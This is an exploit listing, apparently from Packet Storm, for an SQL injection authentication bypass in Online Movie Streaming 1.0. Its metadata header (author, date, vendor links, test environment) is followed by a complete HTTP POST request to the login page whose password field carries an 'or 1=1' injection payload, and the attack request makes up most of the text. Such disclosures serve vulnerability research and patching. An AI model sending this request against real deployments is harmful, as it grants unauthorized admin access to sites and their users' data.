Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
c1c543077b80ab705e658b5b81d57d5c4ca96d224085b4a34ba22a095e3acb02# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Exploit URL: http://TARGET/onlinemovies/Plogin.php
POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1
mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed